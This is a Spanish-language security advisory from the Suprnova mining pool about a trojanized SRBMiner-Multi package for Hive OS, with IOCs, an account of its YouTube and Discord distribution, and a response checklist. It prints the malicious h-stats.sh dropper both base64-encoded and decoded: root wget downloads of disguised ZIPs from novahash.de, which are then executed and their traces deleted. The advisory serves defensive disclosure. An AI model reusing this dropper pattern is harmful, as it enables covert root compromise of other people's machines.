⚠️ Aviso de seguridad · Prioridad alta

Paquete SRBMiner 3.2.5 troyanizado en circulación
Lo que los mineros necesitan saber, en el orden en que les va a importar

Un archivo falso de SRBMiner-Multi se está distribuyendo desde miningrepositories.blog. La carga útil descarga una segunda etapa con privilegios de root desde novahash.de a través del script de estadísticas de Hive OS, cada diez segundos o así. Algo que, dicho con suavidad, resulta bastante descarado.

Publicado el 17 de abril de 2026 · Suprnova.cc · Pools de minería desde 2013

⚠️ Si instalaste este paquete

No intentes limpiar a mano. Formatea el rig.

El script h-stats.sh de este archivo se ejecuta como root en cada poll de estadísticas de Hive OS — aproximadamente cada diez segundos, mientras el rig esté encendido. Descarga y ejecuta una segunda etapa y luego borra los artefactos visibles. Si eliminas los archivos a mano, reaparecen en el siguiente poll. Un detalle poco amable por su parte.

A ese nivel de privilegio, la máquina ya no es de fiar. Debes reinstalar el rig desde una imagen limpia del sistema operativo y rotar todas las credenciales que hayan tocado ese equipo — cuentas de pool y claves de API, claves SSH, semillas de wallet guardadas en disco, sesiones de navegador almacenadas, todo. Revisa también cualquier otro equipo que comparta credenciales con el rig afectado, porque el movimiento lateral es precisamente la clase de entretenimiento que disfruta este tipo de atacante.

Sabemos que «formatea el rig» no es lo que nadie quiere oír un jueves. Es, sin embargo, la única respuesta correcta.

Autoidentificación: si configuraste un rig siguiendo un tutorial de YouTube del usuario «Argenminers» para minar C64Chain o Qubit (QTC) a partir del 16 de abril de 2026, o si alguien te dejó el enlace en el Discord de cualquiera de las dos monedas — por ahí te llegó el archivo. Trata el rig como comprometido y sigue los pasos de arriba.

Resumen

Alguien está distribuyendo un paquete SRBMiner-Multi 3.2.5 manipulado desde miningrepositories.blog. El binario del minero parece legítimo y funciona como cobertura; la parte maliciosa está oculta en h-stats.sh como un bloque base64 que, en cada poll de estadísticas de Hive OS, descarga dos supuestas «imágenes» (en realidad ZIPs) desde novahash.de, las extrae en /etc/, ejecuta los scripts shell contenidos como root y luego recoge las pruebas. Si instalaste este archivo en cualquier rig: formatea. Bloquea novahash.de y miningrepositories.blog en el firewall. Descarga SRBMiner únicamente desde github.com/doktor83/SRBMiner-Multi/releases y verifica el SHA256 contra el valor publicado.

IOCs — para quien solo quiere hacer grep

Todo lo que un defensor necesita en un único bloque. Más detalle abajo, pero si vienes a auditar tu flota, empieza aquí.

Red (bloquear)
Dominio de distribución
miningrepositories.blog
Dominio C2 de segunda etapa
novahash.de
URLs de segunda etapa
https://novahash.de/fileslab/recuaikaan.png
https://novahash.de/fileslab/mqtato-fla.jpg
URL del archivo troyanizado
https://miningrepositories.blog/srbminer-3.2.5.tar.gz
Artefactos de archivo (pueden estar ausentes — el dropper se limpia solo)
/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh
Hashes (binario de cobertura)
SHA256 (srbminer_bin)
9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
BuildID (srbminer_bin)
fc2487ec223c91039748e53c08328af91260cd8c

Los artefactos en disco los limpia el dropper tras cada ejecución, por lo que su ausencia no te exonera. Solo su presencia es concluyente. Juzga a partir de logs, del contenido de h-stats.sh en disco y del tráfico saliente hacia novahash.de.

Vector de distribución

El paquete se ofrece actualmente como descarga de SRBMiner-Multi en miningrepositories.blog, un dominio elegido para sonar genérico y de confianza ante quien busca binarios de mineros. No es un canal de distribución conocido ni legítimo para SRBMiner ni, por lo que puede verse, para nada más.

Señales de alarma rápidas

Distribución: tutoriales de YouTube y siembra en Discord (observado)

El archivo troyanizado no está esperando en un dominio al azar a que alguien tropiece con él. Se está promocionando activamente a través de canales en los que los mineros confían:

Distribución observada (16 de abril de 2026)

Qué nos dice esto sobre el modus operandi del atacante

Esto es ingeniería social, no una descarga drive-by. Cada paso del proceso está elegido a propósito para bajar la guardia de la víctima:

  1. Elegir monedas pequeñas con Discords activos y un goteo constante de recien llegados. C64Chain y QTC son justo el tipo de moneda en la que un minero novato aterriza en el Discord, pregunta cómo empezar y acepta agradecido el primer enlace que alguien servicial le da. Las monedas grandes reciben más escrutinio; las pequeñas, más confianza.
  2. Producir un tutorial que realmente funcione. El vídeo de YouTube muestra un rig que efectivamente mina, porque el binario del minero en el archivo es un minero real y funcional (cobertura). La prueba visual convence — un vídeo con shares aceptados entrando vale más que mil «confía en mí».
  3. Primero acumular reputación, luego armar. Una vez que el vídeo existe y unos cuantos comentarios dicen «me ha funcionado, gracias», el enlace se alimenta a sí mismo — cada nuevo espectador ve prueba social antes de ver un motivo para desconfiar.
  4. Sembrar en canales de principiantes. Soltar el enlace en canales de Discord donde los novatos piden ayuda de configuración. La carga se ejecuta en el primer poll de estadísticas; el atacante no necesita nada más de la víctima que «sigue el tutorial».
  5. Contar con que los moderadores no auditan archivos. Prácticamente ningún Discord de moneda tiene recursos para hacer ingeniería inversa a cada archivo «útil» publicado en su canal de minería. Un usuario simpático con canal de YouTube parece un miembro de la comunidad, no una amenaza.
La lección

Un tutorial de YouTube que funciona y un post amable en Discord no son señales de confianza. El vídeo del atacante seguramente muestra un rig minando correctamente — porque lo hace. El daño está dentro de h-stats.sh, ejecutándose como root, en el rig que el espectador acaba de configurar con esmero. Si eres minero nuevo: descarga mineros solo desde el repositorio oficial del proyecto y verifica el SHA256 cada vez. Si llevas un Discord de moneda: considera fijar un aviso en la parte superior del canal de minería — «no confíen en archivos publicados aquí que no vengan del proyecto oficial».

Si formas parte de la comunidad de C64Chain o de Qubit (QTC) y configuraste un rig desde el tutorial de Argenminers, o pasaste el enlace a alguien — comparte este aviso con la comunidad y considera como comprometido cualquier rig montado desde esa guía.

Contenido del archivo

El archivo es una integración completa de minero personalizado para Hive OS, con una integración de Minerstat (mmp-*) colada dentro por buena medida. Las distribuciones auténticas entregan una o la otra, no ambas — así que el mero hecho de encontrarlas juntas ya delata el paquete.

ArchivoTamañoEstado
h-manifest.conf616 BLimpio (alteraciones cosméticas)
h-run.sh764 BLimpio (alteraciones cosméticas)
h-config.sh205 BLimpio
h-stats.sh8646 BMALICIOSO — contiene el dropper
mmp-stats.sh4116 BLimpio
mmp-external.conf63 BLimpio (versión inconsistente)
srbminer_bin20 309 184 B (~20 MB)Probablemente auténtico (cobertura)

Pistas de reempaquetado

Ninguno de los siguientes rasgos es malicioso en sí mismo — son las pistas diagnósticas que muestran que el paquete no viene de donde afirma venir:

La carga: h-stats.sh

La mayor parte de h-stats.sh es, molestamente, un parser de estadísticas de Hive OS perfectamente funcional. Consulta la API HTTP del minero en 127.0.0.1:$MINER_API_PORT, parsea hashrate, shares, temperaturas y velocidades de ventilador para workers de GPU y CPU, gestiona minería mono y dual-algoritmo, y devuelve un JSON de estadísticas válido al agente Hive. No es casual: es la cobertura. Si el script fallara, Hive mostraría el rig como offline y el operador investigaría en minutos.

Añadido después de la lógica legítima de estadísticas y antes de las asignaciones de fallback, aparece este bloque:

p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &

Decodificada, la carga base64 es:

nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
  && sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
  && sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
  && unzip -q -o /etc/mqtato-fla.zip -d /etc \
  && bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &

Comportamiento, paso a paso

  1. Se descargan dos supuestos archivos de imagen (.png y .jpg) mediante wget desde novahash.de. Las extensiones de imagen son camuflaje: el contenido real son archivos ZIP. Técnica conocida para sortear filtros de egress ingenuos que inspeccionan tráfico de scripts y archivos pero dejan pasar imágenes.
  2. Cada archivo se escribe en /etc/, se renombra a .zip y se extrae en el mismo sitio con unzip -o (sobrescritura).
  3. Cada archivo contiene un script shell (recuaikaan.sh, mqtato-fla.sh) que luego se ejecuta — el primero explícitamente con sudo, el segundo apoyándose en el contexto de root ya establecido por el agente Hive.
  4. Los cuatro artefactos (ambos .zip y ambos .sh) se eliminan luego de /etc/. Esto limpia la huella del dropper: una inspección forense de /etc/ posterior no encuentra nada, mientras que lo que los scripts de segunda etapa hayan instalado en otro sitio permanece residente.
  5. La cadena entera corre en segundo plano vía nohup … &, por lo que la salida legítima de estadísticas ni se bloquea ni se retrasa. Hive sigue viendo un rig saludable.

Por qué h-stats.sh es el punto de inyección perfecto

Por qué esta ubicación es especialmente molesta, en lenguaje llano

Qué gana con eso el atacante:

Imagínate que alguien mete en tu buzón una nota que dice «por favor, deja la puerta trasera abierta», y vuelve a dejar la misma nota cada diez segundos para siempre, recogiendo cada vez la anterior. No puedes ganar ese juego. Tienes que cambiar la cerradura.

El minero de cobertura: srbminer_bin

El binario incluido parece una build legítima o casi legítima de SRBMiner-Multi. Su trabajo, desde el punto de vista del atacante, es no llamar la atención:

El plan del atacante depende de que el minero produzca hashrate y shares plausibles para que los dashboards de Hive y Minerstat se vean normales y el operador no tenga motivos para investigar. Toda la funcionalidad maliciosa observada está en h-stats.sh; el binario no es el vector de ataque.

Recomendación de verificación

Compara el SHA256 del binario con los hashes conocidos publicados en github.com/doktor83/SRBMiner-Multi/releases, o envía el archivo a VirusTotal. Una discrepancia con cualquier hash SRBMiner publicado es motivo para tratar el binario como sospechoso, al margen de lo que diga este aviso.

Indicadores de compromiso completos

Red

Archivos (artefactos del dropper)

Eliminados por el propio dropper tras ejecutarse — su ausencia no exculpa:

/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh

Hashes de archivo

Firmas de proceso y comportamiento

Señales a nivel de paquete (útiles para detectar otros troyanizados)

Checklist de respuesta a incidentes

Si instalaste el paquete en cualquier rig o servidor, recorre los siguientes pasos en orden. Con un leve punto de mal humor. Es la postura emocional adecuada.

1

Aislar

Desconecta el rig afectado de la red inmediatamente. No lo apagues primero: el estado de memoria puede ser útil, y algunos mecanismos de persistencia se disparan en el arranque.

2

Bloquear C2 en todas partes

Añade novahash.de a los sinkholes DNS y a las listas de bloqueo del firewall en toda la red, no solo en el rig afectado. El movimiento lateral es posible; asume que otros equipos pueden haber sido tocados.

3

Snapshot para forense (opcional)

Si tienes paciencia, imagina el disco antes de la remediación y captura memoria si tienes herramientas. Si no — bien, pasa directo a la remediación.

4

Comprobar artefactos del dropper

ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null
5

Comprobar indicadores de rootkit userland

cat /etc/ld.so.preload   # debe estar vacío o no existir
6

Buscar archivos modificados recientemente

find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
     -mtime -30 -type f -ls 2>/dev/null
7

Auditar mecanismos de persistencia

crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all
8

Rastrear backdoors SSH

find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config
9

Comprobar conexiones salientes

ss -tnp | grep -E '(srbminer|sh|wget|curl)'
10

Verificar integridad de la config del minero

Compara la dirección de wallet y la URL del pool en la configuración real del minero contra lo que está declarado en Hive o Minerstat. Las cargas de segunda etapa de este tipo suelen reemplazar las credenciales de minado por las del atacante, para que la víctima pague obedientemente la factura eléctrica del atacante. Lo cual, francamente, tiene poco estilo.

11

Ejecutar escáneres de rootkit

chkrootkit
rkhunter --check --skip-keypress
12

Revisar logs de sudo

grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null
13

Si cualquier indicador aparece — reinstalar. Sin más.

Código userland ejecutándose como root en intervalos cortos no se limpia a mano de forma fiable. Reinstala el SO del rig, rota todas las credenciales que hayan tocado la máquina (cuentas de pool, claves SSH, semillas de wallet guardadas en disco) y audita cualquier otro dispositivo que comparta credenciales con el rig afectado. Ocasión perfecta para arreglar cosas que llevas tiempo posponiendo.

Endurecimiento: cómo no acabar aquí

Algunas costumbres que habrían evitado todo esto de raíz. Ninguna es novedosa; todas son aburridas; lo aburrido es justamente lo que buscamos.

1. Descargar mineros solo de fuentes verificadas

Para SRBMiner, eso significa github.com/doktor83/SRBMiner-Multi/releases. Para cualquier otro minero, busca la página oficial del proyecto en GitHub — normalmente enlazada desde la página Getting Started del pool. Todo lo demás es conjetura.

2. Verificar siempre el SHA256

Las releases oficiales publican sumas. sha256sum sobre la descarga, comparándolo con el valor publicado. Ocho segundos. Reinstalar un rig lleva bastante más.

3. Desconfiar de paquetes «custom» o «patched»

Salvo que vengan de una fuente comunitaria conocida y de confianza. Los wrappers de integración de estadísticas son un punto de inyección favorito precisamente porque casi nadie los lee. Ese es literalmente el motivo por el que estamos aquí.

4. Leer los scripts de integración antes del primer arranque

Pasa 30 segundos con less h-stats.sh antes de apuntar un flight sheet a un minero personalizado. Cadenas codificadas largas, llamadas de red a dominios desconocidos, escrituras en /etc/ o /usr/local/ — cualquiera de estas señales justifica, por sí sola, una pausa.

5. Filtrado de salida

Un rig no necesita alcanzar dominios arbitrarios. Lista blanca de IPs del pool y bloqueo de todo lo demás. Un rig filtrado correctamente no puede ser «stageado» aunque un script malicioso se ejecute, porque no tiene dónde descargar la segunda etapa.

6. Monitorizar conexiones salientes

Un rig haciendo solicitudes HTTPS a cualquier cosa fuera del pool es sospechoso por defecto. No es paranoia: es la detección más barata que tienes.

7. Recordar qué corre como root

En Hive OS, el agente Hive corre como root y la cuenta user tiene sudo sin contraseña. Cualquier script que el agente invoque tiene, de facto, privilegios de root. Tenlo presente. Si tu framework admite usuarios de minado no privilegiados, úsalos.

Una nota de Suprnova

Los operadores de pools y sus mineros son una población objetivo muy atractiva para este tipo de ataque. Un minero troyanizado en un rig no compromete solo ese rig — puede redirigir hashrate fuera de tu pool, extraer credenciales de pool de los archivos de configuración y servir de pivote hacia el resto de tu infraestructura. Nuestros usuarios son, de media, más técnicos, más valiosos y más específicamente objetivo que la población general de «gente que descarga cosas», y esa atención, en balance, no es un cumplido.

Si te topas con una descarga de minero sospechosa, un archivo inusual o un DM de Discord/Telegram promocionando un minero «custom» o «patched», por favor reénvíalo a admin@suprnova.cc o déjalo en nuestro Discord. Lo miraremos, actualizaremos este aviso si hace falta y avisaremos al resto de la comunidad. Cinturón, tirantes y un toque de paranoia compartida — los tres pilares de un rig de minado feliz.

En resumen

El archivo en https://miningrepositories.blog/srbminer-3.2.5.tar.gz está troyanizado. El binario del minero es cobertura; la carga real vive en h-stats.sh y contacta con novahash.de cada diez segundos, como root, mientras el rig siga funcionando.

Si instalaste este paquete en cualquier máquina, debes formatearla. No «investigarla». No «limpiarla». Formatearla. Rota todas las credenciales que hayan tocado la máquina. Audita todo lo que comparta credenciales con ella. No existe una opción intermedia que también sea correcta.

Bloquea novahash.de y miningrepositories.blog. En DNS y en el firewall de salida. En todas partes, no solo en el rig afectado.

Descarga mineros solo de fuentes upstream verificadas y verifica el SHA256 cada vez. Las releases oficiales de SRBMiner están en github.com/doktor83/SRBMiner-Multi/releases. Cualquier otro sitio que afirme ofrecer SRBMiner es, como mínimo, no fiable.

Artículos relacionados

Seguridad del pool de minería

Cómo los pools se protegen a sí mismos y a sus mineros frente a DDoS, exploits y otras amenazas.

Guía de hardware de minería

Guía práctica para elegir y mantener hardware de minería — incluyendo el lado software, a veces aburrido.

Un día en la vida de un operador de pool

Cuando equipos comprometidos apuntan a tu pool, todo el mundo pierde — incluido el martes del operador.